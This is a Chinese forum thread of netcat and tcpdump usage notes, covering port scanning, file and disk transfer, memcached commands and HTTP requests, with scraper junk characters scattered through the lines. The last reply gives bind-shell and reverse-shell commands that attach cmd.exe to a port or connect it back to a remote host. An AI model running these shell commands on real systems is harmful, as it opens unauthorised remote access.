易陆发现互联网技术论坛

 找回密码
 开始注册
查看: 4563|回复: 13
收起左侧

tcpdump 、nc的使用记录

[复制链接]
发表于 2017-3-8 22:56:54 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?开始注册

x
nc -v 100.12.11.122  4952  ' R+ c) P1 x( L) a* ^1 Z  A
nc的使用见回帖
: n- }2 w7 m( T; \+ \0 w' ^9 ]: R! S" {: S: y
tcpdump -i any port 4952 -A -nnn -vvv |grep storage   4 C- }8 O- d1 h. z4 m, _
& ~& H0 j' q& J. N5 V
tcpdump略" Q( k6 H% n, n
# P, Y2 e% R  Y. o/ ]6 Q
- Q9 J2 K- w/ m) j0 C

相关帖子

 楼主| 发表于 2017-3-9 18:50:59 | 显示全部楼层
nc 的参  数:
6 q' A! t2 m+ _ -g<网关>  设置路由器跃程通信网关,最丢哦可设置8个。7 {% q: u; X, W) G
-G<指向器数目>  设置来源路由指向器,其数值为4的倍数。' k# v/ j+ |1 w; A/ d9 H+ f5 c
-h  在线帮助。
+ q- v; J: }: N5 ~ -i<延迟秒数>  设置时间间隔,以便传送信息及扫描通信端口。
. @: W! a$ `' M0 j -l  使用监听模式,管控传入的资料。+ v0 y; F% H: J8 w) H( D% Y
-n  直接使用IP地址,而不通过域名服务器。
$ w/ j/ |2 j) `% ]. Z! n! t3 M -o<输出文件>  指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。0 W4 N% q$ }6 q1 k3 b5 ]# v- d
-p<通信端口>  设置本地主机使用的通信端口。( X6 v5 [* T9 H; V$ V
-r  乱数指定本地与远端主机的通信端口。9 K* B  E3 L5 e: @) W
-s<来源位址>  设置本地主机送出数据包的IP地址。6 U" g6 {  r( [# y" B8 z/ k
-u  使用UDP传输协议。
+ \& C' k7 J6 r1 t: B5 N-v 详细输出--用两个-v可得到更详细的内容
. N: [! M6 K7 K" h' H -w<超时秒数>  设置等待连线的时间。4 Y3 z) _6 l/ b- p1 U
-z  使用0输入/输出模式,只在扫描通信端口时使用。
 楼主| 发表于 2017-3-9 18:51:42 | 显示全部楼层
测试:
) H8 ?0 ?! h& j7 v/ ^  端口扫描
6 B4 g/ Y" d3 u* p" P. {# nc -v -w 2 192.168.2.34 -z 21-240 q% y8 Z- f( N9 B4 _
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused) w5 ?3 R0 Y# j9 ]' Y" e  \
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
: Z* {" Q# L6 F! \" I# fnc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused2 f) |6 o, U* p
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused
 楼主| 发表于 2017-3-9 18:52:16 | 显示全部楼层
从192.168.2.33拷贝文件到192.168.2.349 z( H3 A5 ]' V$ \8 [5 P( V  X# z/ G
在192.168.2.34上: nc -l 1234 > test.txt% j9 ], J' |$ n5 o# h- O
在192.168.2.33上: nc 192.168.2.34 < test.txt
 楼主| 发表于 2017-3-9 18:54:57 | 显示全部楼层
简单聊天工具
& q4 ]) \) @5 W$ |3 g  W( n在192.168.2.34上: nc -l 12343 H9 L9 e% I' P' d9 f4 o2 X2 r
在192.168.2.33上: nc 192.168.2.34 1234: V' P! F6 N: w/ ?6 Z
这样,双方就可以相互交流了。使用ctrl+C(或D)退出。
+ `  I$ q" r) l+ y" t
 楼主| 发表于 2017-3-9 18:56:09 | 显示全部楼层
用nc命令操作memcached1 y8 y% B2 t. c& C
1)存储数据:printf “set key 0 10 6rnresultrn” |nc 192.168.2.34 11211' L) F$ D& ?  r3 ]9 L6 l$ ~
2)获取数据:printf “get keyrn” |nc 192.168.2.34 11211
0 B+ r& `: P: ]. F( v+ s- s: o" t3)删除数据:printf “delete keyrn” |nc 192.168.2.34 11211' w/ F7 i( j4 L
4)查看状态:printf “statsrn” |nc 192.168.2.34 11211& v2 T! {5 |! U6 t( ^: R2 n
5)模拟top命令查看状态:watch “echo stats” |nc 192.168.2.34 11211
3 A7 F8 @% o9 A0 m6)清空缓存:printf “flush_allrn” |nc 192.168.2.34 11211 (小心操作,清空了缓存就没了)
 楼主| 发表于 2017-3-9 18:56:31 | 显示全部楼层
nc -p 1234 -w 5 host.example.com 80* p7 v0 _4 A$ T" n
建立从本地1234端口到host.example.com的80端口连接,5秒超时3 d! e2 f+ I4 L* L& h
nc -u host.example.com 53/ L  }, M; m7 O/ @9 i4 d/ P" u( S
u为UDP连接
 楼主| 发表于 2017-3-9 18:57:24 | 显示全部楼层
echo -n "GET / HTTP/1.0"r"n"r"n" | nc host.example.com 80' V9 q6 S( `7 o0 |
连接到主机并执行
 楼主| 发表于 2017-3-9 18:58:55 | 显示全部楼层
nc -v -z host.example.com 70-80, @$ w9 M( v7 a  j6 B: E' G3 M
扫描端口(70到80),可指定范围。-v输出详细信息。
 楼主| 发表于 2017-3-9 18:59:31 | 显示全部楼层
远程拷贝文件, W7 m$ X9 h" S) @3 t4 V# I. L
从server1拷贝文件到server2上。需要先在server2上,用nc激活监听,
0 |+ [9 K; t7 v6 f% X% r# w ) b7 u+ {2 V4 [, ?! W
server2上运行:
3 {* U+ [2 v- R/ f+ A1 c, J" m / T: S; K% ]8 b3 d: S- N, W9 {
root@hatest2 tmp]# nc -lp 123 > install.log
- t( l$ K) k! q5 V
( l' t6 M1 f8 O) [: Kserver1上运行:
" E( ^' D1 l' z' G& o9 Y( m
! {7 z9 o9 M7 Y! H[root@hatest1 ~]# ll install.log
1 O- j6 T. [5 B" a3 R) A; ~: V, H-rw-r–r–  1 root root 39693 12月 20  2007 install.log
, C8 ~0 \. @. L9 t[root@hatest1 ~]# nc -w 1 192.168.228.222 123 < install.log
 楼主| 发表于 2017-3-9 19:00:07 | 显示全部楼层
克隆硬盘或分区' j  s' o! x7 }
操作与上面的拷贝是雷同的,只需要由dd获得硬盘或分区的数据,然后传输即可。
1 X" f$ P, S. _; s2 z0 ?克隆硬盘或分区的操作,不应在已经mount的的系统上进行。所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix工 具光盘)启动系统后,在server2上进行类似的监听动作:+ i. z) D" H) J) D
# nc -l -p 1234 | dd of=/dev/sda
& ~* w& C" M0 @  [/ ^; \0 j 5 w6 U& Q3 g1 u! b0 V
server1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:& `4 C' l* l5 [0 C6 S0 d/ P8 L; Y
# dd if=/dev/sda | nc 192.168.228.222 1234  S& c2 F1 \5 u' a. O1 R2 L) h8 i

4 J. t0 y7 n% y6 T9 c- d& }※ 完成上述工作的前提,是需要落实光盘的拯救模式支持服务器上的网卡,并正确配置IP。
 楼主| 发表于 2017-3-9 19:01:51 | 显示全部楼层
克隆硬盘或分区
- W1 }0 U7 z5 b2 \操作与上面的拷贝是雷同的,只需要由dd获得硬盘或分区的数据,然后传输即可。
) w6 t: p: y; e+ N+ j( }克隆硬盘或分区的操作,不应在已经mount的的系统上进行。所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix工 具光盘)启动系统后,在server2上进行类似的监听动作:% G! d3 j2 x/ L# K! o; W6 I" o7 }% D! v8 n
# nc -l -p 1234 | dd of=/dev/sda# F$ p( G+ H. n

4 o: n' y: a5 u" `! sserver1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:
+ C5 F6 \8 v7 K+ |( b# dd if=/dev/sda | nc 192.168.228.222 1234# `2 }8 ^! v# e8 r) N& P

" X: O. V* }- [) Y5 `※ 完成上述工作的前提,是需要落实光盘的拯救模式支持服务器上的网卡,并正确配置IP。
发表于 2017-3-9 19:09:26 | 显示全部楼层
保存Web页面, g; b% Y2 o* q6 H1 e; h* ?# i
# while true; do nc -l -p 80 -q 1 < somepage.html; done
发表于 2017-3-9 19:12:51 | 显示全部楼层
模拟HTTP Headers,获取网页源代码和返回头部信息* ?; _9 B/ H) c

2 @( K- w/ p. h( Y% H' l7 T- E. n[root@hatest1 ~]# nc www.linuxso.com 808 i2 k/ ^/ B/ j0 G, v& S, V/ @  ]0 k) D
GET / HTTP/1.17 k5 B) T+ y4 a+ p" p" k8 ^# c
Host: ispconfig.org( E' C4 l& @2 m  f
Referrer: mypage.com
( e5 w# M9 R$ y3 qUser-Agent: my-browser
6 W  E, d: Y4 g; A: ?
2 T( Q8 L0 K  x& Z  V5 f1 |HTTP/1.1 200 OK
3 ^0 [$ P- f2 e8 T3 R$ NDate: Tue, 16 Dec 2008 07:23:24 GMT# ?. ?, D& U1 F  ^7 W7 ^" L
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8# i3 d9 l6 `0 C5 m) l
Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/  W5 i; p% T* x3 ~& @4 @# |7 \
Expires: 0) p  g5 }1 H) }7 k2 O
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
! J, C8 d! S) X/ B- I/ h+ L- pPragma: no-cache" I' Z  Z* x  M" o% ?0 ~! g& ]) y
Cache-Control: private, post-check=0, pre-check=0, max-age=07 i/ }, q  G  \) I+ y7 {5 H
Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/) i, J; u, p: C0 {! j, J
Vary: Accept-Encoding
+ I  W* Q6 C$ N% a2 hTransfer-Encoding: chunked
5 R( o  T7 S  X9 I9 PContent-Type: text/html- l8 p, j+ r% Z. A$ ?. a/ j
[......]
% W3 G3 z% X: Q! T0 p- l在nc命令后,输入红色部分的内容,然后按两次回车,即可从对方获得HTTP Headers内容。
* ~- z/ [( i0 {2 [. o9 `2 r8 T
7 K+ x# s0 C& o$ h: ]: \  Y0 I! y. {0 a1 o0 T

& J8 M3 O+ B6 R传输目录
* s6 K& p9 ]+ k+ }6 h5 }/ T' @从server1拷贝nginx-0.6.34目录内容到server2上。需要先在server2上,用nc激活监听,server2上运行:3 ], L9 F8 T! h
引用
9 O+ b: K4 V- C0 E ' a. X9 j* C  F* N: b) d1 z: j
[root@hatest2 tmp]# nc -l 1234 |tar xzvf -
9 q; Y* d: D4 @- `" u% gserver1上运行:* T/ Q7 ?, k" U- k
引用2 U1 Y: c$ ?5 |5 H

% b6 ?8 h3 b$ u: c[root@hatest1 ~]# ll -d nginx-0.6.34
% x9 B7 L# _! [; u+ Tdrwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34
5 x' V3 B& P- W) U! m9 `[root@hatest1 ~]# tar czvf – nginx-0.6.34|nc 192.168.228.222 1234
2 V" Z9 ?6 s( s3 i
9 p1 e/ g" ]! _/ P
- S0 R# o; ?& \; ^+ M# q- ~9 U
. H9 _# e1 D8 ]3 QREMOTE主机绑定SHELL* [0 j! M7 ^/ M" a$ ]
例子:
* I+ _+ f8 e7 [9 {8 {5 d% F   @4 m9 g% ^, s/ W
格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
! R$ j) d+ k% k8 q( {讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
* n0 ]7 [$ I5 `; H' O  t+ }3 W 0 X* u; o/ m  X6 t- c7 d

- F- t0 P+ l) @- h% s; y9 |# M0 x" ~REMOTE主机绑定SHELL并反向连接
/ h6 q1 R, W6 g( Q5 b9 H1 Y- H例子:
1 A  i; y4 Y; U) n' f; { " U0 `9 h' D* ]
格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 53543 e. d+ b8 K/ \: J2 Z  {
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
% u& E# B3 q, l3 g* ~3 y以上为最基本的几种用法(其实NC的用法还有很多,
& B) v) }- I# L1 J& [- o5 p7 ^! m当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......)& w) c* w( d+ r. o0 M
您需要登录后才可以回帖 登录 | 开始注册

本版积分规则

关闭

站长推荐上一条 /4 下一条

北京云银创陇科技有限公司以云计算运维,代码开发

QQ|返回首页|Archiver|小黑屋|易陆发现技术论坛 ( 蜀ICP备2026014127号-1 )点击这里给我发消息

GMT+8, 2026-4-9 02:06 , Processed in 0.061149 second(s), 25 queries .

Powered by Discuz! X3.4 Licensed

© 2012-2025 Discuz! Team.

快速回复 返回顶部 返回列表